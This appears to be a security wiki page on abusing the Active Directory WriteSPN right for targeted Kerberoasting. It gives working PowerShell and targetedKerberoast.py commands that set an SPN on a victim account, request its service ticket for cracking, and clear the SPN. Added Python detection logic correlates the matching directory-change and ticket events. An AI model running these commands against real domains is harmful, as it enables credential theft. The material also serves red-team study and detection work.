# WriteSPN

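An attacker who holds the WriteSPN right over a target can register a domain SPN with the target as its principal. Immediately after registering the SPN, the attacker requests a service ticket to carry out a Kerberoasting attack and then deletes the SPN.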

{% tabs %}
{% tab title="Windows" %}

<pre class="language-powershell"><code class="lang-powershell"><strong># Store the credentials of the user object that holds the right
</strong>$SecPassword = ConvertTo-SecureString '&#x3C;PASS>' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('contoso.com\user-A', $SecPassword)

<strong># Register the SPN on the target object
</strong>Set-DomainObject -Credential $Cred -Identity user-B -Set @{serviceprincipalname='nonexistent/HTTP'}

<strong># Request a service ticket for the target
</strong>Get-DomainSPNTicket -Credential $Cred user-B | fl

<strong># Clean up the SPN after the attack
</strong>Set-DomainObject -Credential $Cred -Identity user-B -Clear serviceprincipalname
</code></pre>

{% endtab %}

{% tab title="UNIX" %}

```bash
python3 targetedKerberoast.py -v -d contoso.com -u user-A -p 'Password123!' --request-user user-B --only-abuse
```

{% endtab %}
{% endtabs %}
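The register, request, delete sequence described above leaves a short-lived pattern that can be correlated on the defensive side. The following Python example is added here and is not part of the original page or of any tool it mentions. It assumes events already normalized from Windows Security events 5136 (directory object modified) and 4769 (Kerberos service ticket requested); the field names, the sample events and the five-minute window are constructed assumptions.

```python
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=5)  # assumed correlation window; tune per environment

# Constructed sample events in a hypothetical normalized schema (not raw event XML).
EVENTS = [
    {"time": "2024-05-01T10:00:00", "id": 5136, "actor": "user-A", "target": "user-B",
     "object_class": "user", "attribute": "servicePrincipalName", "op": "add",
     "value": "nonexistent/HTTP"},
    {"time": "2024-05-01T10:00:04", "id": 4769, "actor": "user-A", "service": "user-B"},
    {"time": "2024-05-01T10:00:09", "id": 5136, "actor": "user-A", "target": "user-B",
     "object_class": "user", "attribute": "servicePrincipalName", "op": "delete",
     "value": "nonexistent/HTTP"},
    # Benign: an admin sets an SPN on a service account and leaves it in place.
    {"time": "2024-05-01T11:00:00", "id": 5136, "actor": "admin", "target": "svc-sql",
     "object_class": "user", "attribute": "servicePrincipalName", "op": "add",
     "value": "MSSQLSvc/db01.contoso.com:1433"},
    {"time": "2024-05-01T11:30:00", "id": 4769, "actor": "app01$", "service": "svc-sql"},
]

def find_spn_roast_sequences(events, window=WINDOW):
    """Alert when an SPN is added to a user object, a service ticket for that
    account is requested, and the SPN is removed again, all inside `window`."""
    pending = {}  # target account -> details of the still-open SPN addition
    alerts = []
    for ev in sorted(events, key=lambda e: e["time"]):
        ts = datetime.fromisoformat(ev["time"])
        is_spn_change = (ev["id"] == 5136 and ev.get("object_class") == "user"
                         and ev.get("attribute", "").lower() == "serviceprincipalname")
        if is_spn_change and ev["op"] == "add":
            pending[ev["target"]] = {"added": ts, "by": ev["actor"],
                                     "spn": ev["value"], "tickets": []}
        elif is_spn_change and ev["op"] == "delete":
            st = pending.pop(ev["target"], None)
            # Only the full add -> ticket -> delete chain inside the window alerts.
            if st and st["tickets"] and ts - st["added"] <= window:
                alerts.append({"target": ev["target"], "spn": st["spn"],
                               "modified_by": st["by"], "ticket_requesters": st["tickets"],
                               "seconds": int((ts - st["added"]).total_seconds())})
        elif ev["id"] == 4769:
            st = pending.get(ev["service"])
            if st and ts - st["added"] <= window:
                st["tickets"].append(ev["actor"])
    return alerts

if __name__ == "__main__":
    print(find_spn_roast_sequences(EVENTS))
```

Event 5136 is only recorded when directory service change auditing is enabled and the object has a matching audit entry, so confirm that coverage for user objects before relying on this correlation.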

## References

{% embed url="<https://support.bloodhoundenterprise.io/hc/en-us/articles/17222775975195-WriteSPN>" %}

